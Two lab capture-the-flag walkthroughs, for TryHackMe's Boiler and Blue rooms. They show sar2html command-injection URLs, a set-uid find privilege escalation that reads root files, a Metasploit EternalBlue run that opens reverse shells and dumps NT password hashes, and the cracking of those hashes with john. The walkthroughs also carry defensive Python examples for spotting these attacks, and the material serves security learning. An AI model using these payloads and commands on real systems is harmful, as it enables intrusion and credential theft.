[Hacking walkthrough] Boiler CTF

Another day, another adventure in the CTF challenge. This time I’m going to do a write-up on Boiler CTF. This is an intermediate CTF challenge. The room is written by MrSeth6797, who is also the creator of the Simple CTF challenge. Without further ado, let’s jump into the rabbit hole.

Task 1: Enumerate, enumerate and enumerate.

As the title says, enumeration is the key to this challenge. Not only that, it is also an important aspect of every sort of CTF challenge and pentest. This task requires the challenger to collect any available information on the machine.

First and foremost, fire up your nmap with the following command.

$ nmap -Pn -A -v <MACHINE IP>

Using the nmap scan, you will discover 3 open ports, namely FTP (port 21), HTTP (port 80) and Webmin (port 10000). Let’s move on to task 1-1.

Task 1-1: Ghost file

Let’s investigate the FTP server for any anonymous files (anon files).

Looks like the FTP server is empty, or is it? I continued by opening the FTP server in FileZilla with the hidden-files option enabled.

Input the IP address and port number (username and password are not required; it is anonymous after all).

We get a hidden file named .info.txt. Open the file and you will get a ciphered text.

Looks like a Caesar cipher with a shift of 13, i.e. ROT13. Deciphering the text gives the following result.

This is the opening hint given by the author. “Enumeration is the key”.

Answer: txt

Task 1-2: What is on the highest port?

Just like the same old MrSeth, who likes to put something on a higher port number. This time we are going to do a full port scan using the following command.

$ nmap -p- <MACHINE IP>

That’s it, an open port can be found on 55007. Let’s continue with a targeted scan of that port using the following command, to make sure what is running on it.

Bingo! Port 55007 is reserved for SSH. Let me repeat the moral of the story again: assign a common service to a higher port number, so that those noobs will never find it.

Answer: ssh

Task 1-3: What is running on port 10000?

This is a straightforward answer.

Answer: webmin

Task 1-4: Can you exploit port 10000?

After searching on Google, none of the exploits can be applied to this port. This is because Webmin is at the latest version (as of 23/8/2019). Moral of the story: always keep your applications up to date, unless there is a 0-day exploit.

Answer: nay

Task 1-5: What is the CMS on port 80

Port 80? Time to fire up gobuster to look for suspicious directories.

$ gobuster dir -u <MACHINE IP> -w /usr/share/dirb/wordlists/common.txt

We get Joomla CMS.

Answer: Joomla

Task 1-6: More enumeration

From this point onward, you need to enumerate the Joomla server really hard. Well, let’s honor the message below, sent by the author.

This is the first time I got trolled so hard by a CTF challenge. Thanks to MrSeth, who provided me with some hints. The hint is: enumerate the Joomla directory with gobuster. Use the following command and dictionary.

$ gobuster dir -u 10.10.79.97/joomla/_files -w /usr/share/dirb/wordlists/common.txt

After that, investigate the directories one by one and eventually you will find something different. Which directory is different from the others? ‘_test’.

sar2html? What the freak is that, and how are we going to exploit it? After doing some googling, I got the answer below.

These few sentences are very useful. This is a URL injection of sorts: the plot parameter ends up in a shell command, so the URL carries the command. Go to the sar2html page, enter the following URL and click on the select host option.

http://<MACHINE IP>/joomla/_test/index.php?plot=;ls

What do you see? The URL is now your shell on the server, but it isn’t root. The file we are interested in here is log.txt. To read the log file, you need the following URL

http://<MACHINE IP>/joomla/_test/index.php?plot=;cat log.txt

You get login credentials where the username and password are ‘basterd’ and ‘superduperp@$$’. Where do we apply these credentials? Remember the SSH port, as the log said? Give it a try!

Answer: log.txt
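
The plot parameter above is handed to a shell, which is why “;ls” runs a command. The following detection and hardening example is added here and is not from the write-up or from sar2html: it parses constructed access-log lines, flags plot values that contain shell metacharacters, and shows the allowlist check plus argv-style invocation (the program path is a placeholder) that keeps such input from reaching a shell.

```python
import re
from urllib.parse import unquote_plus

# Constructed web-server access-log lines (not from the write-up). Two carry
# the ";ls" and ";cat log.txt" payloads shown above, one carries a pipe, the
# rest are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Aug/2019:10:01:02 +0000] "GET /joomla/_test/index.php?plot=web01 HTTP/1.1" 200 5120
10.0.0.9 - - [23/Aug/2019:10:01:09 +0000] "GET /joomla/_test/index.php?plot=;ls HTTP/1.1" 200 812
10.0.0.9 - - [23/Aug/2019:10:01:15 +0000] "GET /joomla/_test/index.php?plot=%3Bcat%20log.txt HTTP/1.1" 200 640
10.0.0.7 - - [23/Aug/2019:10:02:00 +0000] "GET /joomla/index.php?option=com_content HTTP/1.1" 200 9000
10.0.0.9 - - [23/Aug/2019:10:02:30 +0000] "GET /joomla/_test/index.php?plot=web01%7Cid HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters a host name never contains but a shell command string does.
SHELL_META_RE = re.compile(r"[;|&`$()<>\n]")

# Strict allowlist for what sar2html should accept as a host name
# (assumed policy for this example; the page does not show sar2html's code).
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def parse_query(query):
    """Split a query string on '&' only and percent-decode keys and values.
    ';' is data here, not a separator (older parse_qs treats it as one)."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def parse_line(line):
    """Return the parsed fields of one combined-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["url"].partition("?")
    rec["path"] = path
    rec["query"] = parse_query(query)
    return rec


def find_injection_attempts(log_text, param="plot"):
    """Flag requests whose `param` value contains shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or param not in rec["query"]:
            continue
        for value in rec["query"][param]:
            if SHELL_META_RE.search(value):
                hits.append({"ip": rec["ip"], "ts": rec["ts"],
                             "path": rec["path"], "value": value})
    return hits


def is_valid_host(value):
    """Server-side check: accept only a plain host name, never a command."""
    return HOSTNAME_RE.fullmatch(value) is not None


def build_plot_argv(host):
    """Hardened pattern: validate, then pass the value as its own argv element
    for subprocess.run(argv) with no shell, so metacharacters are inert.
    The program path is a placeholder; sar2html's real one is not on the page."""
    if not is_valid_host(host):
        raise ValueError("invalid host name")
    return ["/usr/bin/sar2html-plot", "--host", host]
```

Run find_injection_attempts over a real access log to see the same ;ls and ;cat requests that the walkthrough sends; a web application firewall rule on the plot parameter can use the same metacharacter class.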

Task 2: Exploit

After the enumeration, it is time to exploit the machine. From this point, I assume you have successfully logged into basterd’s SSH shell.

Task 2-1: Where is Stoner’s password?

We know that there is another user called stoner and we need the SSH password. Notice that there is only one script file inside basterd’s folder. Instead of running the script, read it.

You will notice a line of phrase. That is the password for stoner: superduperp@$$no1knows. Log in as stoner with that password using SSH.

Answer: backup

Task 2-2: Capture Stoner’s flag

Capturing this flag is a bit tricky, since stoner’s folder is totally empty. Or is it?

Well, I don’t think so. This flag is actually a hidden file named .secret. Always check for hidden files.

Answer: You made it till here, well done.

Task 2-3: Privilege escalate

Time for the final boss of the challenge. How are you going to root the machine? sudo -l? Nah, MrSeth will never repeat the same mistake.

This time I’m going to do some searching on GTFOBins with the shell attribute; the find command looks promising. Create a sample file inside stoner’s directory and run the search with the following command.

$ find sample -exec whoami \;

Congratulations, the machine is now rooted!

Answer: find
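
The find trick works because the binary carries the set-uid bit, so the defensive counterpart is an audit for set-uid binaries outside the distribution’s baseline. This example is added here and is not from the write-up; the baseline list and the demo tree it builds are constructed assumptions.

```python
import os
import stat
import tempfile

# Baseline of binaries expected to be set-uid root on a typical Debian/Ubuntu
# host. Constructed for this example; tune it to the distribution's packages.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/pkexec", "/bin/su", "/bin/mount",
    "/bin/umount", "/bin/ping",
}


def find_suid(roots=("/usr", "/bin", "/sbin"), require_root_owner=True):
    """Walk `roots` and return regular files carrying the set-uid bit.

    With require_root_owner=True (the production setting) only root-owned
    files count, since those are the ones that grant uid 0 on execution."""
    found = set()
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: do not follow symlinks
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                    continue
                if require_root_owner and st.st_uid != 0:
                    continue
                found.add(os.path.realpath(path))  # dedupe merged-/usr paths
    return sorted(found)


def unexpected_suid(paths, allowlist=EXPECTED_SUID):
    """Return the set-uid files not in the baseline; a set-uid find(1) lands here."""
    allowed = {os.path.realpath(p) for p in allowlist}
    return [p for p in paths if os.path.realpath(p) not in allowed]


def make_demo_tree():
    """Constructed demo: a temp dir holding a fake set-uid 'find' plus a plain
    file. Returns (dir, resolved path of the set-uid file). chmod u+s on your
    own file needs no root, so this runs unprivileged."""
    d = tempfile.mkdtemp(prefix="suid-demo-")
    for name, mode in (("find", 0o4755), ("plain", 0o755)):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(p, mode)
    return d, os.path.realpath(os.path.join(d, "find"))


if __name__ == "__main__":
    # Real audit of the local system; prints nothing when only baseline
    # binaries are set-uid root.
    for p in unexpected_suid(find_suid()):
        print("unexpected set-uid root binary:", p)
```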

Task 2-4: The final flag

Input the following command and capture the final flag.

$ find sample -exec cat /root/root.txt \;

Answer: It wasn’t that hard, was it?

Conclusion

That’s all for the Boiler CTF write-up. Before I end this post, I would like to say thanks to MrSeth, who guided me in completing the room. Hope you learned something new, and see you again!

TryHackMe – Blue


Title: Blue
Room: Blue
Info: Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
Room code: blue
Points: 3850
Difficulty: Relatively easy
Maker: DarkStar7471

MASSCAN & NMAP

UDP/TCP port scan of the machine and its services.

root@kali:~/trymehack/blue# masscan -p1-65535,U:1-65535 10.10.24.91 --rate=1000 -e tun0

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-09-04 00:56:01 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49153/tcp on 10.10.24.91                                  
Discovered open port 49154/tcp on 10.10.24.91                                  
Discovered open port 49152/tcp on 10.10.24.91                                  
Discovered open port 137/udp on 10.10.24.91                                    
Discovered open port 3389/tcp on 10.10.24.91 

# Nmap 7.70 scan initiated Tue Sep  3 21:03:21 2019 as: nmap -sC -sV -p1-1000 -o nmap.scan_mil 10.10.24.91
Nmap scan report for 10.10.24.91
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:ae:0a:27:4e:02 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-09-03T20:04:00-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-09-03 21:04:00
|_  start_date: 2019-09-03 20:54:40

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep  3 21:04:06 2019 -- 1 IP address (1 host up) scanned in 45.67 seconds

SMBCLIENT & SMBMAP

Enumerating share names.

root@kali:~/trymehack/blue# smbclient -L \\10.10.24.91
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
smb1cli_req_writev_submit: called for dialect[SMB2_10] server[10.10.24.91]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.24.91 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
root@kali:~/trymehack/blue# smbmap -H 10.10.24.91
[+] Finding open SMB ports....
root@kali:~/trymehack/blue# 

NMAP – SMB SCRIPTS

We use the nmap smb-vuln scripts to check whether the machine is vulnerable to any of them, and find that it is vulnerable to MS17-010, also known as ETERNALBLUE.

root@kali:~/trymehack/blue# nmap --script smb-vuln-* 10.10.24.91
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-03 21:11 EDT
Nmap scan report for 10.10.24.91
Host is up (0.20s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 42.25 seconds

METASPLOIT – ETERNALBLUE

We use Metasploit with the module exploit/windows/smb/ms17_010_eternalblue against the machine, configure it and run the exploit.

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.24.91
rhosts => 10.10.24.91
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.8.1.72:4444 
[+] 10.10.24.91:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.24.91:445 - Connecting to target for exploitation.
[+] 10.10.24.91:445 - Connection established for exploitation.
[+] 10.10.24.91:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.24.91:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.24.91:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.24.91:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.24.91:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.24.91:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.24.91:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.24.91:445 - Sending all but last fragment of exploit packet
[*] 10.10.24.91:445 - Starting non-paged pool grooming
[+] 10.10.24.91:445 - Sending SMBv2 buffers
[+] 10.10.24.91:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.24.91:445 - Sending final SMBv2 buffers.
[*] 10.10.24.91:445 - Sending last fragment of exploit packet!
[*] 10.10.24.91:445 - Receiving response from exploit packet
[+] 10.10.24.91:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.24.91:445 - Sending egg to corrupted connection.
[*] 10.10.24.91:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.8.1.72:4444 -> 10.10.24.91:49196) at 2019-09-03 21:15:49 -0400
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

UPGRADE SHELL – METERPRETER

We use the post-exploitation module multi/manage/shell_to_meterpreter to upgrade our shell to meterpreter.

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions 

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell x64/windows  Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.8.1.72:4444 -> 10.10.24.91:49196 (10.10.24.91)

msf5 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade


msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > show options 

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

msf5 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf5 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.8.1.72:4433 
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (179779 bytes) to 10.10.24.91
[*] Meterpreter session 2 opened (10.8.1.72:4433 -> 10.10.24.91:49203) at 2019-09-03 21:21:37 -0400
[*] Stopping exploit/multi/handler

msf5 post(multi/manage/shell_to_meterpreter) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.8.1.72:4444 -> 10.10.24.91:49196 (10.10.24.91)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      10.8.1.72:4433 -> 10.10.24.91:49203 (10.10.24.91)

msf5 post(multi/manage/shell_to_meterpreter) > 

METASPLOIT – HASHDUMP

meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 55bd17830e678f18a3110daf2c17d4c7...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

Jon:"Nah boi, I ain't sharing nutting with you"

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::


meterpreter >

JOHN – CRACK PASSWORDS

We crack the hashes with john.

root@kali:~/trymehack/blue# john hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:00 DONE (2019-09-03 21:34) 2.061g/s 10515Kp/s 10515Kc/s 10520KC/s alqui..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
root@kali:~/trymehack/blue#
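
The john run above cracks Administrator to an empty password; the dump itself already says so, because 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string. The following example is added here and is not from the write-up: it parses the three pwdump lines from the hashdump output and raises the findings a defender would file, namely blank passwords, the RID-500 account, and whether LM hashes are still being stored.

```python
import re

# NT and LM hash values of an empty password (well-known constants, not
# taken from the write-up).
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# The three pwdump-format lines from the hashdump output above.
HASHDUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""

# user:RID:LM hash:NT hash::: (pwdump format as printed by hashdump)
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_pwdump(text):
    """Return a list of {user, rid, lm, nt} dicts; malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["rid"] = int(d["rid"])
        d["lm"] = d["lm"].lower()
        d["nt"] = d["nt"].lower()
        accounts.append(d)
    return accounts


def assess(accounts):
    """Map user name -> list of findings raised from the dump alone."""
    findings = {}
    for a in accounts:
        issues = []
        if a["nt"] == EMPTY_NT:
            issues.append("blank password (NT hash of empty string)")
        if a["lm"] != EMPTY_LM:
            issues.append("LM hash stored; LM storage should be disabled")
        if a["rid"] == 500 and a["nt"] == EMPTY_NT:
            issues.append("built-in Administrator (RID 500) has a blank password")
        findings[a["user"]] = issues
    return findings


def lm_storage_enabled(accounts):
    """True if any account still has a real LM hash (all are empty markers here)."""
    return any(a["lm"] != EMPTY_LM for a in accounts)


if __name__ == "__main__":
    for user, issues in assess(parse_pwdump(HASHDUMP)).items():
        print(user, "->", issues or "no findings")
```

hashdump does not show whether an account is disabled, so a blank-password finding on Administrator should be confirmed against the account status before it is reported as an exposure.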

FLAGS

Finding the flags.

meterpreter > ls
Listing: C:\
============

Mode                 Size                Type  Last modified                     Name
----                 ----                ----  -------------                     ----
40777/rwxrwxrwx      0                   dir   2009-07-13 23:18:56 -0400         $Recycle.Bin
40777/rwxrwxrwx      0                   dir   2009-07-14 01:08:56 -0400         Documents and Settings
40777/rwxrwxrwx      0                   dir   2009-07-13 23:20:08 -0400         PerfLogs
40555/r-xr-xr-x      4096                dir   2009-07-13 23:20:08 -0400         Program Files
40555/r-xr-xr-x      4096                dir   2009-07-13 23:20:08 -0400         Program Files (x86)
40777/rwxrwxrwx      4096                dir   2009-07-13 23:20:08 -0400         ProgramData
40777/rwxrwxrwx      0                   dir   2018-12-12 22:13:22 -0500         Recovery
40777/rwxrwxrwx      4096                dir   2018-12-12 18:01:17 -0500         System Volume Information
40555/r-xr-xr-x      4096                dir   2009-07-13 23:20:08 -0400         Users
40777/rwxrwxrwx      16384               dir   2009-07-13 23:20:08 -0400         Windows
100666/rw-rw-rw-     24                  fil   2018-12-12 22:47:39 -0500         flag1.txt
567211570/r-xrwx---  438533065912909807  fif   13905563959-04-24 15:54:40 -0400  hiberfil.sys
567211570/r-xrwx---  438533065912909807  fif   13905563959-04-24 15:54:40 -0400  pagefile.sys

meterpreter > cat flag1.txt 
flag{******************}
meterpreter > pwd
C:\
meterpreter >

We use dir to find the files whose name starts with “flag”.

Command:

dir flag* /s /p
C:\>dir flag* /s /p
dir flag* /s /p
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\

03/17/2019  02:27 PM                24 flag1.txt
               1 File(s)             24 bytes

 Directory of C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent

03/17/2019  02:26 PM               482 flag1.lnk
03/17/2019  02:30 PM               848 flag2.lnk
03/17/2019  02:32 PM             2,344 flag3.lnk
               3 File(s)          3,674 bytes

 Directory of C:\Users\Jon\Documents

03/17/2019  02:26 PM                37 flag3.txt
               1 File(s)             37 bytes

     Total Files Listed:
               5 File(s)          3,735 bytes
               0 Dir(s)  22,796,713,984 bytes free

C:\>

C:\>type C:\Users\Jon\Documents\flag3.txt
type C:\Users\Jon\Documents\flag3.txt
flag{*******************************}
C:\>
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>type flag2.lnk
type flag2.lnk
[binary contents of flag2.lnk; the readable string inside it is the shortcut target C:\Windows\System32\config\flag2.txt]
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>dir /ah C:\Windows\System32\config
dir /ah C:\Windows\System32\config
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Windows\System32\config

File Not Found

C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>

Our flag2 is located in C:\Windows\System32\config.

C:\Windows\system32>type C:\Windows\System32\config\flag2.txt
type C:\Windows\System32\config\flag2.txt
flag{****************************}
C:\Windows\system32>
